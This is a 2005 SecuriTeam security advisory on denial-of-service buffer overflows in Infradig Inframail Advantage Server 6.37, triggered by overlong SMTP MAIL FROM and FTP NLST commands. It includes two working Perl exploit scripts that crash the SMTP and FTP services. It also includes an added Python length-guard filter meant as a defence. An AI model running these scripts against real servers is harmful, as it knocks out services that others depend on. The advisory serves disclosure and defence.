[NEWS] Infradig Systems Inframail Advantage Server Multiple DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 06/30/05

    To: list@securiteam.com
    Date: 30 Jun 2005 15:21:35 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Infradig Systems Inframail Advantage Server Multiple DoS
    ------------------------------------------------------------------------

    SUMMARY

    Infradig servers (http://www.infradig.com/) are "servers that support
    SMTP, POP, IMAP, NNTP (NEWS), FTP, HTTP, WEBMAIL, WEBDAV, WAPMAIL, SIP,
    mailing-lists, calendars and document sharing".

    Lack of proper command filtering allows attackers to send a long string as
    a command, causing a buffer overflow that crashes the Infradig server.

    DETAILS

    Vulnerable Systems:
     * Infradig Systems Advantage Server Edition version 6.37

    Immune Systems:
     * Infradig Systems Advantage Server Edition version 7.2

    The SMTP MAIL FROM: and FTP NLST commands are vulnerable to a buffer
    overflow. Issuing the character 'A' 40960 times as an argument to the
    MAIL FROM: command will cause the ifmail.exe process to die and re-launch.

    Issuing the character 'A' roughly 102400 times to the NLST command and
    then issuing the character 'A' roughly 102400 times to the NLST command
    again will cause all processes running under the ifmailsvc.exe process to
    die and re-launch (these processes include slapd.exe, slurpd.exe,
    ifmail.exe, ifweb.exe and others).

    Vendor Status:
    The vendor has released a patch for Infradig Systems Advantage Server
    Edition.
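
    One way to enforce the missing command filtering in front of an unpatched
    server, as an added example that is not part of the original advisory or
    the vendor's patch: a streaming guard that rejects a command line as soon
    as it crosses a length limit, without buffering the rest of it. The class
    and function names are hypothetical, the SMTP limit is the 512-octet
    command-line maximum from RFC 5321, and the FTP limit is an assumed site
    policy value.

```python
# Added example (not from the advisory): streaming length guard for command lines.
SMTP_MAX_LINE = 512  # RFC 5321 4.5.3.1.4: command line limit, CRLF included
FTP_MAX_LINE = 1024  # assumption: site policy value, RFC 959 defines no limit

class CommandLineGuard:
    """Split a client byte stream into CRLF lines and flag overlong ones."""
    def __init__(self, max_line):
        self.max_line = max_line
        self.buf = bytearray()
        self.dropping = False  # discarding the tail of a rejected line

    @staticmethod
    def _verb(line):
        parts = bytes(line[:32]).split(None, 1)
        return parts[0][:16].decode("ascii", "replace").upper() if parts else ""

    def feed(self, chunk):
        """Return [(verdict, verb, octets_seen), ...] for one received chunk."""
        events = []
        self.buf += chunk
        while True:
            end = self.buf.find(b"\r\n")
            if end == -1:
                # Unterminated: reject once over the limit, keep 1 byte (maybe a CR).
                if not self.dropping and len(self.buf) > self.max_line:
                    events.append(("reject", self._verb(self.buf), len(self.buf)))
                    self.dropping = True
                if self.dropping:
                    del self.buf[:-1]
                return events
            line = self.buf[:end + 2]
            del self.buf[:end + 2]
            if self.dropping:
                self.dropping = False  # terminator of the rejected line
            elif len(line) > self.max_line:
                events.append(("reject", self._verb(line), len(line)))
            else:
                events.append(("accept", self._verb(line), len(line)))


def demo():
    """Constructed sessions with argument sizes taken from the advisory."""
    smtp = b"HELO example.test\r\nMAIL FROM:" + b"A" * 40960 + b"\r\n"
    ftp = b"USER u\r\nPASS p\r\n" + (b"NLST " + b"A" * 102400 + b"\r\n") * 2
    out = {}
    for name, limit, data in (("smtp", SMTP_MAX_LINE, smtp), ("ftp", FTP_MAX_LINE, ftp)):
        guard = CommandLineGuard(limit)
        out[name] = [e for i in range(0, len(data), 1460) for e in guard.feed(data[i:i + 1460])]
    return out
```

    A "reject" event is the point at which a proxy or filter would close the
    connection or answer with an error instead of forwarding the line.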

    Exploit:
    Inframail_SMTPOverflow.pl
    #===== Start Inframail_SMTPOverflow.pl =====
    #
    # Usage: Inframail_SMTPOverflow.pl <ip>
    # Inframail_SMTPOverflow.pl 127.0.0.1
    #
    # Infradig Systems Inframail Advantage Server Edition 6.0
    # (Version: 6.37)
    #
    # Download:
    # http://www.infradig.com/
    #
    ##############################

    use IO::Socket;
    use strict;

    my($socket) = "";

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => "25",
                                        Proto => "TCP"))
    {
            print "Attempting to kill Inframail SMTP server at $ARGV[0]:25...";

            sleep(1);

            print $socket "HELO moto.com\r\n";

            sleep(1);

            print $socket "MAIL FROM:" . "A" x 40960 . "\r\n";

            close($socket);
    }
    else
    {
            print "Cannot connect to $ARGV[0]:25\n";
    }

    # EOF

    Inframail_FTPOverflow.pl
    #
    # Usage: Inframail_FTPOverflow.pl <ip>
    # Inframail_FTPOverflow.pl 127.0.0.1
    #
    # Infradig Systems Inframail Advantage Server Edition 6.0
    # (Version: 6.37)
    #
    # Download:
    # http://www.infradig.com/
    #
    ##############################

    use IO::Socket;
    use strict;

    my($socket) = "";

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => "21",
                                        Proto => "TCP"))
    {
            print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";

            sleep(1);

            print $socket "USER hello\r\n";

            sleep(1);

            print $socket "PASS moto\r\n";

            sleep(1);

            print $socket "NLST " . "A" x 102400 . "\r\n";

            sleep(1);

            print $socket "NLST " . "A" x 102400 . "\r\n";

            close($socket);
    }
    else
    {
            print "Cannot connect to $ARGV[0]:21\n";
    }

    #EOF

    ADDITIONAL INFORMATION

    The information has been provided by Reed Arvin (reedarvin@gmail.com).


    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

